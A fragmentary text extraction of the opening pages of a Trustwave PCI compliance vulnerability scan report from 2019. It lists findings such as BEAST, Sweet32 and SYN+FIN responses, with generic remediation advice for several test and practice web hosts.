Ceh PDF
Ceh PDF
Ceh PDF
Date scan completed: 2019-08-05 Scan expiration date (90 days from date scan completed): N/A
Compliance status: Fail Scan report type: Full Scan
Number of unique in-scope components scanned: 4
Number of identified failing vulnerabilities: 170
Number of components found by ASV but not scanned because 13
scan customer confirmed they were out of scope:
Title Date
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 1 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
HIDDEN TEXT TO MARK THE BEGINNING OF THE TABLE OF CONTENTS
cyclone.ciphertechs.com 45
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 2 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
port-evm-dv1-03.tw-test.net 1637
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 3 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Scan Customer Company JS Int-B Roles 08052019 ASV Company Trustwave Holdings, Inc.
Date Scan Completed 2019-08-05 Scan Expiration Date N/A
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 4 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
1 agent-av-mirror- Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
inc.tw-test.net
Database.
(MV PCI1)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 5 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
8 crackme.cenzic.co Service Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
m
Database.
(MV PCI2)
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 6 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 7 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 8 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 9 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
34 demo.testfire.net Insecure or no Content-Security- Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) Policy header
Database.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 10 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account
information and configuration settings.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host is configured following industry security best practices.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 11 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
48 google- SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
gruyere.appspot.c Vulnerable to CBC Attacks via
om chosen-plaintext (BEAST), CVE-
(MV PCI6) 2011-3389
Note to scan customer:
49 google- System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c TCP Packets
Database.
om
(MV PCI6)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 12 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 13 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 14 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 15 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
76 hackazon.websca Apache HTTP Server before Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com 2.4.11 allows remote attackers
not considered a failing condition under the PCI DSS.
(MV PCI7) to cause a denial of service via
null pointer, CVE-2014-3581
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 16 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 17 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
3185
Note to scan customer:
91 hackazon.websca Insecure configuration of Cookie Medium 4.3 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com attributes
Database.
(MV PCI7)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 18 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
102 hackazon.websca SSL Perfect Forward Secrecy Info 0.0 Out of Scope
ntest.com Supported
(MV PCI7)
Note to scan customer:
103 hackazon.websca Enumerated Applications Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 19 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Database.
webscantest.com
(MV PCI7)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 20 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Database.
webscantest.com
(MV PCI7)
Note to scan customer:
115 hackazon.websca Insufficient or No use of Strict Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Transport Security header
Database.
(MV PCI7)
• Ensure that any web applications running on this host is configured following industry security best practices.
• Upgrade and/or install security updates for Apache HTTP Server.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account
information and configuration settings.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Upgrade and/or install security updates for jQuery.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 21 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 22 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
126 hackxor.sourcefor Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 23 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
134 hackxor.sourcefor Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)
• Ensure that any web applications running on this host is configured following industry security best practices.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• The version of Nginx is out of support by the vendor. Update to a supported version.
• Upgrade and/or install security updates for Nginx.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 24 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
138 jarlsberg.appspot. Block cipher algorithms with Medium 5.0 Out of Scope
com block size of 64 bits (like DES
(MV PCI9) and 3DES) birthday attack
known as Sweet32, CVE-2016-
2183
139 jarlsberg.appspot. SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
com Vulnerable to CBC Attacks via
(MV PCI9) chosen-plaintext (BEAST), CVE-
2011-3389
Note to scan customer:
140 jarlsberg.appspot. System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com TCP Packets
Database.
(MV PCI9)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 25 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
(MV PCI9)
148 jarlsberg.appspot. SSL Certificate Expiring Soon Info 0.0 Out of Scope
com
(MV PCI9)
Consolidated Solution/Correction Plan for the above Component:
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
150 pentesteracadem Block cipher algorithms with Medium 5.0 Out of Scope
ylab.appspot.com block size of 64 bits (like DES
(MV PCI10) and 3DES) birthday attack
known as Sweet32, CVE-2016-
2183
151 pentesteracadem SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
ylab.appspot.com Vulnerable to CBC Attacks via
(MV PCI10) chosen-plaintext (BEAST), CVE-
2011-3389
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 26 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
158 pentesteracadem SSL Certificate Expiring Soon Info 0.0 Out of Scope
ylab.appspot.com
(MV PCI10)
Note to scan customer:
159 pentesteracadem SSL-TLS Certificate Information Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database.
(MV PCI10)
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 27 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:
• Configure the SSL service(s) running on this host to adhere to information security best practices.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 28 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 29 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Note
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 30 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Note
confirm that this code is obtained from a trusted source, that the embedded links redirect to a trusted source, and that the code is implemented securely, or 2) confirm that
the code has been removed. Consult your ASV if you have questions about this Special Note.
Unknown services
Note to scan customer: Unidentified services have been detected. Due to increased risk to the cardholder data environment, identify the service, then either 1) justify the
business need for this service and confirm it is securely implemented, or 2) identify the service and confirm that it is disabled. Consult your ASV if you have questions about
this Special Note.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 31 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
crackme.cenzic.com / MV PCI2
ioc-signatures-inc.tw-test.net / MV PCI8
port-app-dv1-01.tw-test.net / MV PCI11
agent-av-mirror-inc.tw-test.net (MV PCI1) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
crackme.trustwave.com (MV PCI3) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
crackmebank.campbell.devlab (MV PCI4) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
cyclone.ciphertechs.com -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.
google-gruyere.appspot.com (MV PCI6) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 32 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
hackazon.webscantest.com (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
hackxor.sourceforge.net (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
jarlsberg.appspot.com (MV PCI9) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
pentesteracademylab.appspot.com (MV PCI10) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-app-dv1-02.tw-test.net (MV PCI12) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-app-dv2-02.tw-test.net (MV PCI13) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
port-evm-dv1-03.tw-test.net -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.
port-rly-dv3-01.tw-test.net (MV PCI15) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 33 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Scan Customer Company JS Int-B Roles 08052019 ASV Company Trustwave Holdings, Inc.
Date Scan Completed 2019-08-05 Scan Expiration Date N/A
The following issues were identified during this scan. Please review all items and address all that items that affect compliance or the security of your system.
In the tables below you can find the following information about each TrustKeeper finding.
• CVE Number - The Common Vulnerabilities and Exposure number(s) for the detected vulnerability - an industry standard for cataloging vulnerabilities. A comprehensive
list of CVEs can be found at nvd.nist.gov or cve.mitre.org.
• Vulnerability - This describes the name of the finding, which usually includes the name of the application or operating system that is vulnerable.
• CVSS Score - The Common Vulnerability Scoring System is an open framework for communicating the characteristics and impacts of IT vulnerabilities. Further
information can be found at www.first.org/cvss or nvd.nist.gov/cvss.cfm.
• Severity - This identifies the risk of the vulnerability. It is closely associated with the CVSS score.
• Compliance Status - Findings that are PCI compliance violations are indicated with a Fail status. In order to pass a vulnerability scan, these findings must be addressed.
Most findings with a CVSS score of 4 or more, or a Severity of Medium or higher, will have a Fail status. Some exceptions exist, such as DoS vulnerabilities, which are
not included in PCI compliance.
• Details - TrustKeeper provides the port on which the vulnerability is detected, details about the vulnerability, links to available patches and other specific guidance on
actions you can take to address each vulnerability.
For more information on how to read this section and the scoring methodology used, please refer to the appendix.
1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 34 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: agent-av-mirror-inc.tw-test.net
ip_address: 10.70.244.28
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 35 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 36 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Evidence:
application_protocol: ntp
ip_address: 204.13.201.47
port_number: 123
transport_protocol: udp
4 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47
5 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 37 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
6 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or in-house application that uses custom and/or proprietary protocol.
However they can as well indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)
Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.
7 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 204.13.201.47
os_name: embedded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 38 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Synchronized The NTP service on this server does not appear to be synchronized
based on it's Leap Indicator error status.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.
Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp
Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 39 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 40 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
SYN+FIN TCP Packets This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
3 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:synology:rt1900ac
ip_address: 204.13.201.47
os_name: embedded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 41 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Synchronized The NTP service on this server does not appear to be synchronized
based on it's Leap Indicator error status.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.
Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp
Evidence:
application_protocol: ntp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 42 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp
8 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackme.trustwave.com
ip_address: 204.13.201.47
9 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
